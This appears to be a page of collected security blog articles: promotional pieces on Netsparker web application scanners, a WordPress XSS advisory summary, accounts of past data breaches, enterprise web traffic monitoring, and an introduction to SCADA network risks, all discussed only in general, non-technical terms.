SQL Injection Is The Most Widely Exploited Vulnerability

Even though it has been more than sixteen years since the first documented attack of SQL Injection, it is still a very popular vulnerability with attackers and is widely exploited. In fact SQL Injection has always topped the OWASP Top 10 list of most exploited vulnerabilities.

  • Hits: 13499

Web Application Security Interview on Security Weekly – Importance of Automated Web Application Security

netsparker-importance-of-automated-web-application-scannerA few weeks back Security Weekly interviewed Ferruh Mavituna, Netsparker’s CEO and Product Architect. Security Weekly is a popular podcast that provides free content within the subject matter of IT security news, vulnerabilities, hacking, and research and frequently interviews industry leaders such as John Mcafee, Jack Daniel and Bruce Schneier.

During the 30 minutes interview, Security Weekly’s host Paul Asadoorian and Ferruh Mavituna highlight how important it is to use an automated web application security scanner to find vulnerabilities in websites and web applications. They also briefly discuss web application firewalls and their effectiveness, and how Netsparker is helping organizations improve their post scan process of fixing vulnerabilities with their online web application security scanner Netsparker Cloud.

Paul and Ferruh covered several other aspects of web application security during this interview, so if you are a seasoned security professional, a developer or a newbie it is a recommended watch.  

To view the interview, click on the image below:

netsparker-ceo-interview-importance-of-automated-web-application-scanner
Figure 1. Netsparker CEO explains the importance of automated web application security scanners

  • Hits: 8568

WordPress DOM XSS Cross-site Scripting Vulnerability Identified By Netsparker

netsparker-discovery-wordpress-dom-xss-scripting-vulnerability-18th of May 2015, Netsparker annouced yesterday the discovery of critical security vulnerability contained an HTML file found on many WordPress themes, including WordPress.org hosted websites. As reported by Netsparker the specific HTML file is vulnerable to cross-site scripting attacks and session hijack. WordPress.org has already issued an official annoucement and patch (v4.2.2) and recommends WordPress administrators update their website files and themes.

The Genericons icon font package, which is used in a number of popular themes and plugins, contained an HTML file vulnerable to a cross-site scripting attack. All affected themes and plugins hosted on WordPress.org (including the Twenty Fifteen default theme) have been updated yesterday by the WordPress security team to address this issue by removing this nonessential file. To help protect other Genericons usage, WordPress 4.2.2 proactively scans the wp-content directory for this HTML file and removes it. Reported by Robert Abela of Netsparker.

By exploiting a Cross-site scripting vulnerability the attacker can hijack a logged in user’s session. This means that the malicious hacker can change the logged in user’s password and invalidate the session of the victim while the hacker maintains access. As seen from the XSS example in Netsparker's article, if a web application is vulnerable to cross-site scripting and the administrator’s session is hijacked, the malicious hacker exploiting the vulnerability will have full admin privileges on that web application.

Related Security Articles

  • Hits: 10791

Choosing a Web Application Security Scanner - The Importance of Using the Right Security Tools

choosing-web-application-security-scanner-1In the world of information security there exist many tools, from small open source products to full appliances to secure a system, a network, or an entire corporate infrastructure.  Of course, everyone is familiar with the concept of a firewall – even movies like Swordfish and TV shows like NCIS have so very perfectly described, in riveting detail, what a firewall is.  But there are other, perhaps less sexy utilities in a security paradigm.

Various concepts and security practices – such as using complex passphrases, or eschewing passphrases entirely, deeply vetting email sources, safe surfing habits, etc. – are increasingly growing trends among the general workforce at large, especially with the ubiquity of computers at every desk.  But security in general is still unfortunately looked at as an afterthought, even when a lack thereof begets massive financial loss at a seemingly almost daily level.

Security engineers are all too often considered an unnecessary asset, simply a menial role anybody can do; A role that can be assumed as yet another hat worn by developers, system administrators, or, well, perhaps just someone who only shows a modest capability with Excel formulas.  Whatever the reason for such a decision, be it financial or otherwise, the consequences can be severe and long-lasting.  Sony underestimated the value of a strong and well-equipped security team multiple times, choosing to forego a powerful army in lieu of a smaller, less outfitted and, thus, thinner stretched but cheaper alternative.  This, in turn, yielded among the largest multiple security breaches to ever be seen, especially by a single corporation.  Were their security department better outfitted with the right tools, it is quite possible those events would have played out entirely different.

Using The Right Security Tools

So, what constitutes “the right tools”?  Many things.  A well-populated team of capable security engineers certainly can be considered a valuable tool in building a strong security posture within an infrastructure.  But, more specifically and very critically, it is what assets those engineers have at their disposal that may mean the difference between a minor event that never even makes it outside the corporate headquarters doors, and a major event that results in a corporation paying for identity theft protection for millions of customers.  Those tools of course vary widely depending on the organization, but one common element they all do – or at least absolutely should – share is a web application security scanner.

What Is A Web Application Security Scanner?

A website that accepts user input in any form, be it URL values or submitted content, is a complex beast.  Not only does the content an end user provides change the dynamics of the website, but it even has the potential to cripple that website if done maliciously and left unprotected against.  For every possibility of user content, the amount of potential attack vectors increases on a magnitude of near infinity.  It is literally impossible for a security engineer, or even team thereof, to account for all these possibilities by hand and, especially, test them for known or unknown vulnerabilities.

Web scanners exist for this very purpose, designed carefully to predict potential and common methods of attack, then brute-force test them to find any possibility of an existing vulnerability.  And they do this at a speed impossible for humans to replicate manually.  This is crucial for many reasons, namely that it saves time, it is thorough and comprehensive, and, if designed well, adaptive and predictive to attempt clever methods that even the most skilled security engineer may not immediately think of.  Truly, not using a web security scanner is only inviting potentially irreparable harm to a web application and even the company behind it.  But the question remains: Which web scanner works the best?

Options Galore - How To Choose Which Web Scanner Is Right For You

choosing-web-application-security-scanner-2Many websites and web applications are like a human fingerprints, with no two being alike.  Of course, many websites may use a common backend engine – Wordpress, an MVC framework like Laravel or Ruby on Rails, etc. – but the layers on top of those engines, such as plugins or custom coded additions, are often a quite unique collection. 

The backend engine is also not the only portion to be concerned with.  Frontend vulnerabilities may exist with each of these layers, such as cross-site scripting, insecurely implemented jQuery libraries, and add-ons, poor sanitization against AJAX communication models, and many more.  Each layer presents another nearly endless array of input possibilities to test for vulnerabilities.

A web scanner needs to be capable of digging through these unique complexities and provide accurate, reliable findings.  False positives can waste an engineer’s time, or worse, send a development team on a useless chase to perform unit tests, wasted looking for a falsely detected vulnerability.  And if the scanner is difficult to understand or provides little understanding of the detected vulnerabilities, it makes for a challenging or undesirable utility that may go unused.  Indeed, a well-designed web security scanner that delivers on all fronts is an important necessity for a strong security posture and a better secured infrastructure.

Final Thoughts

There is no one perfect solution that will solve all problems and completely secure your website such that it becomes impenetrable.  Further, a web security scanner will only be as effective as the security engineers or developers fixing all flaws it finds.  A web security scanner is only the first of many, many steps, but it indeed is an absolutely critical one for a powerful security posture.

Indeed, we keep returning to that phrase – security posture – because it is a perfectly analogous way to look at web application, system, and infrastructure security for both what it provides and what is required for good posture: a strong backbone.  Focused visibility and a clear view of paths over obstructions is not possible with a slouched posture.  Nothing will provide that vision as clearly as a web security scanner will, and no backbone is complete without a competent and useful web security scanning solution at its top.

  • Hits: 15779

Comparing Netsparker Cloud-based and Desktop-based Security Software solutions – Which solution is best for you?

If you are reading this you have heard about the Cloud Computing. If not, I would be worried! Terms such as Cloud Computing, Software as a Service, Cloud Storage has become a permanent fixture in adverts, marketing content and technical documentation.

Many Windows desktop software applications have moved to the “cloud”. Though, even though the whole industry wants you and your data in the cloud, have you ever looked into the pros and cons of the cloud? Does it make sense to go into that direction?

Let’s use web application security scanners as an example, software that is used to automatically identify vulnerabilities and security flaws in websites and web applications. Most, if not all of the industry leading vendors have both a desktop edition and an online service offering. In fact Netsparker just launched their all new service offering; Netsparker Cloud, the online false positive free web application security scanner. In such case which one should you go for?

As clearly explained in Netsparker Desktop VS Netsparker Cloud both web security solutions are built around the same scanning engine, hence their vulnerability detection capabilities are the same. The main differences between both of them are the other non-scan related features, which also define the scope of the solution.

cloud-based-vs-desktop-based-security-solutions-1Figure 1. Netsparker Cloud-based Security Sanner (Click to enlarge)

For example Netsparker Desktop is ideal for small teams, or security professionals who work on their own and have a small to medium workload. On the other hand Netsparker Cloud is specifically designed for organizations which run and manage a good number of websites and maybe even have their own team of developers and security professionals. It is a multi–user platform, has a vulnerability tracking solution (a system that is similar to a normal bug tracking solution but specifically designed for web application vulnerabilities) and it is fully scalable, to accommodate the simultaneous scanning of hundreds and thousands of web applications.

cloud-based-vs-desktop-based-security-solutions-2Figure 2. Netsparker Desktop-based Security Sanner (Click to enlarge)

Do not just follow the trend, inform yourself. Yes, your readings might be flooding with cloud related terms, the industry is pushing you to move your operations to the cloud as it is cheaper and more reliable, but as clearly explained in the desktop vs cloud web scanner comparison, both solutions still have a place in today’s industry.

  • Hits: 16017

The Importance of Automating Web Application Security Testing & Penetration Testing

automation-web-application-security-testing-1Have you ever tried to make a list of all the attack surfaces you need to secure on your networks and web farms? Try to do it and there will be one thing that will stand out; keeping websites and web applications secure. We have firewalls, IDS and IPS systems that inspect every packet that reaches our servers and are able to drop it should it be flagged as malicious, but what about web applications?

Web application security is different than network security. When configuring a firewall you control who accesses what, but when it comes to web application security you have to allow everybody in, including the bad guys and expect that everyone plays by the rules. Hence web applications should be secure; web application security should be given much more attention and considering the complexity of today’s web applications, it should be automated.

Let’s dig in deep in this subject and see why it needs to be automated.

Automated Web Security Testing Saves Time

Also known as Penetration Testing or “pen testing”, this is the process by which a security engineer or “pen tester” applies a series of injection or vulnerability tests against areas of a website that accept user input to find potential exploits and alert the website owner before they get taken advantage of and become massive headaches or even financial losses. Common places for this can include user data submission areas such as authentication forms, comments sections, user viewing configuration options (like layout selections), and anywhere else that accepts input from the user. This can also include the URL itself, which may have a Search Engine Optimization-friendly URI formatting system.

Most MVC frameworks or web application suites like WordPress offer this type of URI routing. (We differentiate a URL and URI. A URL is the entire address, including the http:// portion, the entire domain, and everything thereafter; whereas the URI is the portion starting usually after the domain (but sometimes including, for context), such as /user/view/123 or test.com/articles/123.)

For example, your framework may take a URI style as test.com/system/function/data1/data2/, where system is the controlling system you wish to invoke (such as an articles system), function is the action you wish to invoke (such as read or edit), and the rest are data values, typically in assumed positions (such as year/month/article-title).

Each of these individual values require a specific data type, such as a string, an integer, a certain regular expression match, or infinite other possibilities. If data types are not strictly enforced, or – sadly as often as this really does happen – user-submitted data is properly sanitized, then a hacker can potentially gain information to get further access, if not even force direct backdoor access via a  SQL injection or a remote file inclusion. Such vulnerabilities are such a prevalent and consistent threat, that for example SQL Injection has made it to the OWASP Top 10 list for over 14 years.

There exist potentially millions, billions, or more combinations of various URIs in your web application, including ones it may not support by default or even to your knowledge. There could be randomphpinfo(); scripts publicly accessible that mistakenly got left in by a developer, an unchecked user input somewhere, some file upload system that does not properly prevent script execution – any random number of possibilities. No security engineer or his team can reasonably assume for or test all of these possibilities. And black-hat hackers know all this too, sometimes better than those tasked to protect against these threats.

Automation Isn’t Just Used By The Good Guys

automation-web-application-security-testing-2Many automated security tools exist not to test and find security holes, but to exploit them when found. Black-hat hackers intent on disrupting your web application possess automated suites as well, because they too, know a manual approach is a waste of time (that is, until they find a useful exploit, and by then it’s sometimes too late).

Some utilities, like Slowloris, exist to exploit known weaknesses in common web services, like the Apache web server itself. Others pray on finding opportunity in the form of insecure common web applications – older versions of Wordpress, phpBB, phpMyAdmin, cPanel, or other frequently exploited web applications. There exist dozens of categorical vulnerabilities, each with thousands or millions of various attack variants. Looking for these is a daunting task.

As quickly as you can spin up a web application, a hacker can automatically scan it and possibly find vulnerabilities. Leveraging an automated web application vulnerability scanner like Netsparker or Netsparker Cloud provides you the agility and proactivity to find and prevent threats before they become seriously damaging problems. This holds especially true for complex web applications such as large forum systems, blogging platforms and custom web applications. The more possibility for user submitted data and functionality, the more opportunity for vulnerabilities to exist and be exploited. And remember, this changes again for every new version of the web application you install. A daunting task, indeed.

Without automation of web application security testing, a true strong security posture is impossible to achieve. Of course, many other layers ultimately exist – least-privilege practice, segregated (jail, chroot, virtual machine) systems, firewalls, etc. – but if the front door is not secure, what does it matter if the walls are impenetrable? With the speed afforded by automation, a strong and capable web vulnerability scanner, and of course patching found flaws and risks, security testing guarantees as best as reasonably possible that the front door to your web application and underlying infrastructure remains reinforced and secure.

  • Hits: 18043

Statistics Highlight the State of Security of Web Applications - Many Still Vulnerable to Hacker Attacks

state-of-security-of-web-applications-1Netsparker use open source web applications such as Twiki for a total different purpose than what they were intended for. They used them to test their own web application security scanners.

Netsparker need to ensure that their scanners are able to crawl and identify attack surfaces on all sort of web applications, and identify as much vulnerabilities as possible. Hence they frequently scan open source web applications. They use open source web applications as a test bed for their crawling and scanning engine.

Thanks to such exercise Netsparker are also helping developers ship more secure code, since they report their findings to the developers and sometimes also help them remediate the issue. When such web application vulnerabilities are identified Netsparker release an advisory and between 2011 and 2014 Netsparker published 87 advisories.

state-of-security-of-web-applications-2

A few days ago Netsparker released some statistics about the 87 advisories they published so far. As a quick overview, from these statistics we can see that cross-site scripting is the most common vulnerability in the open source web applications that were scanned. Is it a coincidence? Not really.

The article also explains why most probably many web applications are vulnerable to this vulnerability, which made it to the OWASP Top 10 list ever since.

The conclusion we can draw up from such statistics is quite predictable, but at the same time shocking. There is still a very long way to go in web application security, i.e. web applications are still poorly coded, making them an easy target for malicious hacker attacks.

  • Hits: 15265

The Implications of Unsecure Webservers & Websites for Organizations & Businesses

implications-of-unsecure-webservers-websites-1Long gone are the days where a simple port scan on a company’s webserver or website was considered enough to identify security issues and exploits that needed to be patched. With all the recent attacks on websites and webservers which caused millions of dollars in damage, we thought it would be a great idea to analyze the implications vulnerable webservers and websites have for companies, while providing useful information to help IT Departments, security engineers and application developers proactively avoid unwanted situations.

Unfortunately companies and webmasters turn their attention to their webservers and websites, after the damage is done, in which case the cost is always greater than any proactive measures that could have been taken to avoid the situation.

Most Security Breaches Could Have Been Easily Prevented

Without doubt, corporate websites and webservers are amongst the highest preference for hackers. Exploiting well-known vulnerabilities provides them with easy-access to databases that contain sensitive information such as usernames, passwords, email addresses, credit & debit card numbers, social security numbers and much more.

The sad part of this story is that in most cases, hackers made use of old exploits and vulnerabilities to scan their targets and eventually gain unauthorized access to their systems.

Most security experts agree that if companies proactively scanned and tested their systems using well-known web application security scanner tools e.g Netsparker, the security breach could have been easily avoided. The Online Trust Alliance (OTA) comes to also confirm this as they analyzed thousands of security breaches that occurred in the first half of 2014 and concluded that these could have been easily prevented. [Source: OTA Website]

Tools such as Web Application Vulnerability Scanners are used by security professionals to automatically scan websites and web applications for hidden vulnerabilities.

When reading through recent security breaches, we can slowly begin to understand the implications and disastrous effects these had for companies and customers. Quite often, the figure of affected users who’s information was compromised, was in the millions. We should also keep in mind that in many cases, the true magnitude of any such security incident is very rarely made known to the public.

Below are a few of the biggest security data breaches which exposed an unbelievable amount of information to hackers:

 eBay.com – 145 Million Compromised Accounts

implications-of-unsecure-webservers-websites-2In late February – early March 2014, the eBay database that held customer names, encrypted passwords, email addresses, physical addresses, phone numbers, dates of birth and other personal information, was compromised, exposing sensitive information to hackers. [Source:  bgr.com website]

JPMorgan Chase Bank – 76 Million Household Accounts & 7 Million Small Business

implications-of-unsecure-webservers-websites-3In June 2014, JPMorgan Chase bank was hit badly and had sensitive personal and financial data exposed for over 80 million accounts. The hackers appeared to obtain a list of the applications and programs that run on the company’s computers and then crosschecked them with known vulnerabilities for each program and web application in order to find an entry point back into the bank’s systems.
[Source: nytimes.com website]

Find security holes on your websites and fix them before they do by scanning your websites and web applications with a Web Application Security Scanner.

Forbes.com – 1 Million User Accounts

implications-of-unsecure-webservers-websites-4In February 2014, the Forbes.com website was succumbed to an attack that leaked over 1 million user accounts that contained email addresses, passwords and more.  The Forbes.com Wordpress-based backend site was defaced with a number of news posts. [Source: cnet.com website]

Snapchat.com – 4.6 Million Username Accounts & Phone numbers

implications-of-unsecure-webservers-websites-5In January 2014, Snapchat’s popular website had over 4.6 million usernames and phone numbers exposed due to a brute force enumeration attack against their Snapchat API. The information was publicly posted on several other sites, creating a major security concern for Snapchat and its users.
[Source: cnbc.com website]

USA Businesses: Nasdaq, 7-Eleven and others – 160 Million Credit & Debit Cards

implications-of-unsecure-webservers-websites-6In 2013 a massive underground attack was uncovered, revealing that over 160 million credit and debit cards were stolen during the past seven years. Five Russians and Ukrainians used advanced hacking techniques to steal the information during these years.  Attackers targeted over 800,000 bank accounts and penetrated servers used by the Nasdaq stock exchange.
[Source: nydailynews.com website]

AT&T - 114,000 iPad Owners (Includes White House Officers, US Senate & Military Officials)

implications-of-unsecure-webservers-websites-7In 2010, a major security breach on AT&T’s website compromised over 114,000 customer accounts, revealing names, email addresses and other information. AT&T acknowledged the attack on its webservers and commented that the risk was limited to the subscriber’s email address.  
Amongst the list were apparently officers from the White House, member of the US Senate, staff from NASA, New York Times, Viacom, Time Warner, bankers and many more. [Source: theguardian.com website]

Target  - 98 Million Credit & Debit Cards Stolen

implications-of-unsecure-webservers-websites-8In 2013, during the period 27th of November and 15th of December more than 98 million credit and debit card accounts were stolen from 1,787 Target stores across the United States. Hackers managed to install malware on Target’s computer systems to capture customers cards and then installed an exfiltration malware to move stolen credit card numbers to staging points around the United States in order to cover their tracks. The information was then moved to the hackers computers located in Russia.

The odd part in this security breach is that the infiltration was caught by FireEye – the $1.6 million dollar malware detection tool purchased by Target, however according to online sources, when the alarm was raised at the security team in Minneapolis, no action was taken as 40 million credit card numbers and 70 million addresses, phone numbers and other information was pulled out of Target’s mainframes!  [Source: Bloomberg website]

SQL Injections & Cross-Site Scripting are one of the most popular attack methods on Websites and Web Applications. Security tools such as Web Vulnerability Scanners allow us to uncover these vulnerabilities and fix them before hackers exploit them.

Implications for Organizations & Businesses

It goes without saying that organizations suffer major damages and losses when it comes to security breaches. When the security breaches happens to affect millions of users like the above examples, it’s almost impossible to calculate an exact dollar ($) figure.

Security Experts agree that data security breaches are among the biggest challenges organizations face today as the problem has both financial and legal implications.

Business Loss is the biggest contributor to overall data breach costs and this is because it breaks down to a number of other sub-categories, of which the most important are outlined below:

  • Detection of the data breach. Depending on the type of security breach, the business can lose substantial amounts of money until the breach is successfully detected. Common examples are defaced website, customer orders and credit card information being redirected to hackers, orders manipulated or declined.
  • Escalation Costs. Once the security breach has been identified, emergency security measures are usually put into action. This typically involves bringing in Internet security specialists, the cybercrime unit (police) and other forces, to help identify the source of the attack and damage it has caused. Data backups are checked for their integrity and everyone is on high-alert.
  • Notification Costs. Customers and users must be notified as soon as possible. Email alerts, phone calls and other means are used to get in contact with the customers and request them to change passwords, details and other sensitive information. The company might also need to put together a special team that will track and monitor customer responses and reactions.
  • Customer Attrition. Also known as customer defection. After a serious incident involving sensitive customer data being exposed, customers are more likely to stop purchasing and using the company’s services. Gaining initially a customer’s trust requires sacrifices and hard work – trying to re-gain it after such an incident means even more sacrifices and significantly greater costs. In many cases, customers choose to not deal with the company ever again, costing it thousands or millions of dollars.
  • Legal Implications. In many cases, customers have turned against companies after their personal information was exposed by a security breach. Legal actions against companies are usually followed by lengthy law suites which end up costing thousands of dollars, not to mention any financial compensation that will be awarded to the end customers.  One example is Target’s security breach mentioned previously which is now facing multiple lawsuits from customers.

As outlined previously, the risk for organizations is high and there are a lot in stake from both, financial and legal prospective.  The security breach examples mentioned in this article make a good point on how big and serious a security breach can become, but also the implications for companies and customers. Our next article will focus on guidelines that can help us prevent data breaches and help our organization, company or business to deal with them.

  • Hits: 30708

The Importance of Monitoring and Controlling Web Traffic in Enterprise & SMB Networks - Protecting from Malicious Websites - Part 1

security-protect-enterprise-smb-network-web-monitoring-p1-1This article expands on our popular security articles (Part 1 & Part 2) that covered the importance of patching enterprise and SMB network systems to protect them from hijacking, hacking attempts, unauthorized access to sensitive data and more. While patching systems is essential, another equally important step is the monitoring of Web traffic to control user activity on the web and prevent users from accessing dangerous sites and Internet resources that could jeopardize the company’s security.

The ancient maxim – prevention is better than cure – holds good in cyberspace as well, and it is prudent to detect beforehand signs of trouble, which if allowed to continue, might snowball into something uncontrollable. One of the best means of such prevention is through monitoring web traffic and to locate potential sources of trouble.

Even if attackers are unable to gain access to your network, they can still hold you to ransom by launching a Distributed Denial of Service or DDoS attack, wherein they choke the bandwidth of your network. Regular customers will not be able to gain access to your servers. Generally downtime for any company these days translates to loss of income and damage to the company’s reputation. Attackers these days might also refuse to relent until a ransom amount is paid up. Sounds a bit too far-fetched? Not really.

Live Attacks & Hacking Attempts On The Internet

It’s hard to image what really is happening right now on the Internet: How many attacks are taking place, the magnitude of these attacks, the services used to launch attacks, attack origins, attack targets and much more.  Hopefully we’ll be able to help change than for you right now…

The screenshot below was taken after monitoring the Norse network which collects and analyzes live threat intelligence from darknets in hundreds of locations in over 40 countries. The attacks are taken from a small subset of live flows against the Norse honeypot infrastructure and represent actual worldwide cyber-attacks:

security-protect-enterprise-smb-network-web-monitoring-p1-2aClick to enlarge

In around 15 minutes of monitoring attacks, we saw more than 5000 different origins launching attacks to over 5800 targets, of which 99% of the targets are located in the United States and 50% of the attack origins were from China.

The sad truth is that the majority of these attacks are initiated from compromised computer systems & servers, with unrestricted web access. All it takes today is for one system to visit an infected site and that could be enough to bring down the whole enterprise network infrastructure while at the same time launch a massive attack against Internet targets.

security-protect-enterprise-smb-network-web-monitoring-p1-3In June 2014, Evernote and Feedly, working largely in tandem, went down with a DDoS attack within two days of each other. Evernote recovered the same day, but Feedly had to suffer more. Although there were two more DDoS attacks on Feedly that caused it to lose business for another two days, normalcy was finally restored. According to the CEO of Feedly, they refused to give in to the demands of ransom in exchange for ending the attack and were successful in neutralizing the threat.

security-protect-enterprise-smb-network-web-monitoring-p1-4Domino's Pizza had over 600,000 Belgian and French customer records stolen by the hacking group Rex Mundi. The attackers demanded $40,000 from the fast food chain in exchange for not publishing the data online. It is not clear whether Domino's complied with the ransom demands. However, they reassured their customers that although the attackers did have their names, addresses and phone numbers, they however, were unsuccessful in stealing their financial and banking information. The Twitter account of the hacking group was suspended, and they never released the information.

Apart from external attacks, misbehavior from employees can cause equal if not greater damage. Employees viewing pornographic material in the workspace can lead to a huge number of issues. Not only is porn one of the biggest time wasters, it chokes up the network bandwidth with non-productive downloads, including bringing in unwanted virus, malware and Trojans. Co-workers unwillingly exposed to offensive images can find the workplace uncomfortable and this may further lead to charges of sexual harassment, dismissal and lawsuits, all expensive and disruptive.

Another major problem is data leakage via e-mail or webmailintended or by accident. Client data, unreleased financial data and confidential plans leaked through emails may cause devastating impact to the business including loss of client confidence.

Web monitoring provides answers to several of these problems. This type of monitoring need not be very intrusive or onerous, but with the right policies and training, employees easily learn to differentiate between appropriate and inappropriate use.

Few Of The Biggest Web Problems

To monitor the web, you must know the issues that you need to focus on. Although organizations differ in their values, policies and culture, there are some common major issues on the Web that cause the biggest headaches:

  • Torrents And Peer-To-Peer Networks offer free software, chat, music and video, which can be easily downloaded. However, this can hog the bandwidth causing disruptions in operation such as for video conferencing and VoIP. Moreover, such sites also contain pirated software, bootlegged movies and inappropriate content that are mostly tainted with various types of virus and Trojans.
  • Gaming sites are notorious for hogging bandwidth and wasting productive time. Employees often find these sites hard to resist and download games. Most of the games carry lethal payloads of virus and other malware, with hackers finding them a common way for SEO poisoning. Even when safe, games disrupt productivity and clog the network.
  • Fun sites, although providing a harmless means of relieving stress, may be offensive and inappropriate to coworkers. Whether your policies allow such humor sites, they can contain SEO poisoned links and Trojans, often clogging networks with their video components.
  • Online Shopping may relate to purchase of work-appropriate items as well as personal. Although the actual purchase may not take up much time, surfing for the right product is a huge time waster, especially for personal items. Individual policies may either limit the access to certain hours of the day or block these sites altogether.
  • Non-Productive Surfing can be a huge productivity killer for any organization. Employees may be obsessed with tracking shares, sports news or deals on commercial sites such as Craigslist and eBay. Company policies can block access to such sites entirely, or limit the time spent on such sites to only during lunchtime.

According to a survey involving over 3,000 employees, Salary.com found over 60% involved in visiting sites unrelated to their work every day. More than 20% spent above five hours a week on non-work related sites. Nearly half of those surveyed looked for a new job using office computers in their work time.

In the next part of our article, we will examine the importance of placing a company security policy to help avoid users visiting sites they shouldn't, stop waisting valuable time and resources on activities that can compromise the enterprise's network security and more. We also take an in-depth look on how to effectively monitor and control traffic activity on the Web in real-time, plus much more.

 

  • Hits: 17530

The Most Dangerous Websites On The Internet & How To Effectively Protect Your Enterprise From Them

whitepaper-malicious-website-contentCompanies and users around the world are struggling to keep their network environments safe from malicious attacks and hijacking attempts by leveraging services provided by high-end firewalls, Intrusion Detection Systems (IDS), antivirus software and other means.   While these appliances can mitigate attacks and hacking attempts, we often see the whole security infrastructure failing because of attacks initiated from the inside, effectively by-passing all protection offered by these systems.

I’m sure most readers will agree when I say that end-users are usually responsible for attacks that originate from the internal network infrastructure. A frequent example is when users find a link while browsing the Internet they tend to click on it to see where it goes even if the context suggests that the link may be malicious. Users are unaware of the hidden dangers and the potential damage that can be caused by clicking on such links.

The implications of following links with malicious content can vary for each company, however, we outline a few common cases often seen or read about:

  • Hijacking of the company’s VoIP system, generating huge bills from calls made to overseas destination numbers (toll fraud)
  • The company’s servers are overloaded by thousands of requests made from the infected workstation(s)
  • Sensitive information is pulled from the workstations and sent to the hackers
  • Company Email servers are used to generate and send millions of spam emails, eventually placing them on a blacklist and causing massive communication disruptions
  • Remote control software is installed on the workstations, allowing hackers to see everything the user is doing on their desktop
  • Torrents are downloaded and seeded directly from the company’s Internet lines, causing major WAN disruptions and delays

As you can see there are countless examples we can analyze to help us understand how serious the problem can become.

Download this whitepaper if you are interested to:

  • Learn which are the Top 10 Dangerous sites users visit
  • Learn the Pros and Cons of each website category
  • Understand why web content filtering is important
  • Learn how to effectively block sites from compromising your network
  • Learn how to limit the amount of the time users can access websites
  • Effectively protect your network from end-user ‘mistakes’
  • Ensure user web-browsing does not abuse your Internet line or Email servers

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

 

Continue reading

  • Hits: 24926

Download Your Free Whitepaper: How to Secure your Network from Cyber Attacks

whitepaper-fight-cybercrime-moduleCybercriminals are now focusing their attention on small and mid-sized businesses because they are typically easier targets than large, multinational corporations.
This white paper examines the rising security threats that put small and medium businesses at risk. It also highlights important security considerations that SMBs should be aware of.

Download this whitepaper if you’re interested to:

  • Learn on how to adopt best practices and boost your business security.
  • Evaluate the SMB digital footprint.
  • Know what to look for in new security solutions.

We apologise however the whitepaper is no longer available by the vendor.  Head to our homepage to read up on new network and security related articles.

  • Hits: 17410

A Networked World: New IT Security Challenges

network-security-1This is the age of networks. Long ago, they said, ‘the mainframe is the computer’. Then it changed to ‘the PC is the computer’. That was followed by ‘the network is the computer’. Our world has been shrunk, enlightened and speeded up by this globe encapsulating mesh of interconnectivity. Isolation is a thing of the past. Now my phone brings up my entire music collection residing on my home computer. My car navigates around the city, avoiding traffic in real time. We have started living in intelligent homes where we can control objects within it remotely.

On a larger scale, our road traffic system, security CCTV, air traffic control, power stations, nuclear power plants, financial institutions and even certain military assets are administered using networks. We are all part of this great cyber space. But how safe are we? What is our current level of vulnerability?

Tower, Am I Cleared For Landing?

March 10, 1997: It was a routine day of activity at Air Traffic Control (ATC) at Worcester, Massachusetts, with flight activity at its peak. Suddenly the ground to air communications system went down. This meant that ATC could not communicate with approaching aircraft trying to land. This was a serious threat to all aircraft and passengers using that airport. All incoming flights had to be diverted to another airport to avoid a disaster.

This mayhem was caused by a 17 year old hacker named Jester. He had used a normal telephone line and physically tapped into it, giving him complete control of the airport’s entire communications system. His intrusion was via a telephone junction box, which in turn ended up being part of a high end fire backbone. He was caught when, directed by the United States Security Service, the telephone company traced the data streams back to the hacker’s parents’ house. Jester was the first juvenile to be charged under the Computer Crimes Law.

As our world becomes more and more computerised and our computer systems start interconnecting, the level of vulnerability goes up. But should this mean an end to all advancement in our lives? No. We need to make sure we are safe and the things that make our lives easier and safer are also secure.

Intruder Alert

April 1994: An US Airforce Base realised that their high level security network was not just hacked, but network-security-2secure documents were stolen. This resulted in an internal cyber man-hunt. The bait was laid and all further intrusions were monitored. A team of 50 Federal Agents finally tracked down 2 hackers who were using US based social networking systems to hack into the Airforce Base. But it was later revealed that the scope of intrusion was not just limited to the base itself: they had infiltrated a much bigger military organisation. The perpetrators were hackers with the aliases of ‘datastreamcowboy’ and ‘kuji’.

‘Datastreamcowboy’ was a 16 year old British national who was apprehended on May 4th 1994, and ‘kuji’ was a 21 year old technician named Mathew Bevan from Cardiff, Wales. ‘datastreamcowboy’ was like an apprentice to ‘kuji’. ‘datastreamcowboy’ would try a method of intrusion and, if he failed, he would go back to ‘kuji’ for guidance. ‘kuji’ would mentor him to a point that on subsequent attempts ‘datastreamcowboy’ would succeed.

What was their motive? Bragging rights in the world of hacking for being able to penetrate the security of the holy grail of all hackers: the Pentagon.

But the future might not see such benign motives at play. As command and control of military installations is becoming computerised and networked, it has become imperative to safeguard against intruders who might break into an armoury with the purpose of causing damage to it or to control and use it with malice.

Social Virus

October 2005: The social networking site MySpace was crippled by a highly infectious computer virus. The virus took control of millions of online MySpace profiles and broadcasted the hacker’s messages. The modus operandi of the hacker was to place a virus on his own profile. Whenever someone visited his profile page, he/she would be infected and their profile would show the hacker’s profile message. These new users now being infected would spread the infection through their friends on MySpace, and this created a massive chain reaction within the social network community. The mass infection caused the entire MySpace social network to grind to a halt.

Creator of this mayhem was Sammy Kamkar, a 19 year old. But his attack was not very well organised as he left digital footprints and was later caught. Banned from using a computer for 3 years, he later became a security consultant helping companies and institutions safeguard themselves against attacks.

What that showed the world was the fact that a cyber attack could come from anywhere, anytime.

In our current digital world we already know that a lot of our complex systems like Air Traffic Control, power stations, dams, etc are controlled and monitored using computers and networks. Let’s try to understand the technology behind it to gauge where the security vulnerabilities come from.

SCADA: Observer & Controller

Over the last few decades, SCADA technology has enabled us to have greater control over predominantly mechanical systems which were, by design, very isolated. But what is SCADA? What does it stand for?

SCADA is an acronym for Supervisory Control And Data Acquisition. A quick search on the internet and you would find the definition to be as follows:

SCADA (supervisory control and data acquisition) is a type of industrial control system (ICS). Industrial control systems are computer controlled systems that monitor and control industrial processes that exist in the physical world. SCADA systems historically distinguish themselves from other ICS systems by being large scale processes that can include multiple sites and large distances. These processes include industrial, infrastructure, and facility-based processes as described below:

  • Industrial processes include those of manufacturing, production, power generation, fabrication and refining, and may run in continuous, batch, repetitive, or discrete modes.
  • Infrastructure processes may be public or private and include water treatment and distribution, wastewater collection and treatment, oil and gas pipelines, electrical power transmission and distribution, wind farms, civil defence siren systems and large communication systems.
  • Facility processes occur both in public facilities and private ones, including buildings, airports, ships, and space stations. They monitor and control heating, ventilation and air conditioning systems (HVAC), access and energy consumption.

This effectively lets us control the landing lights on a runway, gates of a reservoir or a dam, connection and disconnection of power grids to a city supply.

